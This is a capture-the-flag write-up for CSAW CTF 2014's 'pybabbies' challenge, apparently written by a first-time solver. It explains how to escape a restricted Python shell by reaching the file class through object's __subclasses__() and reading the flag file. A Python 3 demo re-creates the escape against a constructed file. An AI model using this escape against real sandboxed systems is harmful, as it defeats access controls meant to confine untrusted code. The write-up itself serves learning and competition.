CSAW CTF 2014 is the second CTF contest I've attended (the first one was HITCON CTF 2014). Since this is the first time I've actually solved something in a contest, I decided to post my first writeup.
I solved 4 challenges in the contest: Trivia 10 -- We don't know either, Exploitation 100 -- bo, Exploitation 200 -- pybabbies and Exploitation 400 -- saturn. We don't know either and bo are easy, so I won't post writeups for them. This writeup is for Exploitation 200 -- pybabbies.
The challenge gave us a Python script called pyshell.py. After taking a good look at it, we can see that it is a self-made Python shell.
This Python shell lets us send and execute a Python command. Unlike the normal interpreter, though, it bans some strings such as
sys ... etc. Moreover, it deletes almost every reference to an object, except
To put it short, we can't call any function except
sys ..., either. The goal is to print the flag, so in a normal shell we would either use
os.system("cat flag") or use
f = open("flag", "r").read() and print it out.
But since this shell bans those commands, we have to find another way to get the flag.
After doing some research on the internet, I found this link (Escaping Python Sandboxes, listed in the reference below), which points in the right direction. Although the script deletes the references to the objects we need, we can still reach them through the class hierarchy:
().__class__.__bases__[0].__subclasses__() lists every direct subclass of object. Note the [0]: ().__class__ is tuple, and its __bases__ is the one-element tuple (object,), so __bases__ itself has no __subclasses__; you have to index into it first. Every built-in type that is loaded hangs off object, so it is reachable from there without ever writing its name.
Using the method described in that blog post, I got hold of the
file type (in Python 2, file is a built-in type and a direct subclass of object, so it shows up in that list), which lets me open a file and read it.
So here is the exploit:
1. First, pick the file type out of
().__class__.__bases__[0].__subclasses__() and use it as the
file object to read the flag into a variable
2. Simply print out the variable to get the flag
We also have to guess the filename of the flag; it is "key", so the actual payload opens key rather than flag.
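As an added example (not the author's payload and not the challenge's pyshell.py), here is a self-contained re-creation of the technique under Python 3. It generalizes the trick slightly: instead of indexing a fixed position in the subclass list, it walks the whole tree below object and picks the class by name. In Python 2 that walk finds file directly under object; Python 3 dropped the file builtin, but _io.FileIO sits a few levels down (object -> _IOBase -> _RawIOBase -> FileIO) and the same walk finds it. The "key" file and its content are constructed here for the demo; the only call to open() is in the setup, not on the exploit path.

```python
# Added example: re-creating the __subclasses__() escape from the writeup.
# This is not the challenge's pyshell.py nor the author's payload; the file
# name ("key") and its content are constructed for the demo.
import os
import tempfile


def reachable_classes():
    """Return every class reachable from object via __subclasses__().

    Start from ().__class__.__bases__[0], which is object: the tuple's
    __bases__ is itself a tuple, hence the [0]. type.__subclasses__(cls)
    is used instead of cls.__subclasses__() because the latter raises
    TypeError when cls is type itself (it is reached early in the walk).
    """
    root = ().__class__.__bases__[0]          # == object, without naming it
    seen, stack, found = set(), [root], []
    while stack:
        cls = stack.pop()
        for sub in type.__subclasses__(cls):
            if sub not in seen:
                seen.add(sub)
                found.append(sub)
                stack.append(sub)
    return found


def find_file_class():
    """Pick out a class that can open files, without writing open or file.

    Python 2 exposes `file` directly under object. Python 3 dropped that
    builtin, but `_io.FileIO` is a few levels down
    (object -> _IOBase -> _RawIOBase -> FileIO) and the same walk finds it.
    """
    for cls in reachable_classes():
        if cls.__name__ in ("file", "FileIO"):
            return cls
    raise LookupError("no file-like class reachable from object")


def read_via_subclasses(path):
    """Read `path` the way the exploit does: through the recovered class."""
    handle = find_file_class()(path, "r")
    try:
        data = handle.read()                  # FileIO.read() returns bytes
    finally:
        handle.close()
    return data.decode() if isinstance(data, bytes) else data


def demo():
    """Write a constructed 'key' file, then recover its content via the escape."""
    workdir = tempfile.mkdtemp()
    key_path = os.path.join(workdir, "key")
    # Setup only: the exploit path above never calls open().
    with open(key_path, "w") as fh:
        fh.write("constructed-demo-key-not-the-real-flag\n")
    try:
        return read_via_subclasses(key_path)
    finally:
        os.remove(key_path)
        os.rmdir(workdir)


if __name__ == "__main__":
    print(find_file_class())
    print(demo(), end="")
```

In the real challenge the index into __subclasses__() has to be found by hand (printing the list and counting), because the sandbox strips most of the names this helper leans on; the walk above just shows that the class is always there to be found, whichever position it lands in.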
Reference: Escaping Python Sandboxes